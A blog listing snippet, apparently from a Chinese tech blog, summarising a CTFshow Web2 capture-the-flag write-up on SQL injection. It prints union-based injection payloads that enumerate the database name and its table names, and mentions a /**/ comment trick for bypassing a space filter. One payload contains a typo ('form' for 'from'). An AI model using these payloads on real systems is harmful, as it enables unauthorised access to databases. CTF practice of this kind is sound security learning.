- 博客(1)
- 收藏
- 关注
原创 CTFshow--Web2,简单SQL注入
SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过有回显则爆库名:admin' or 1=1 union select 1,database(),3接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2'
2022-02-28 15:37:31 414
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人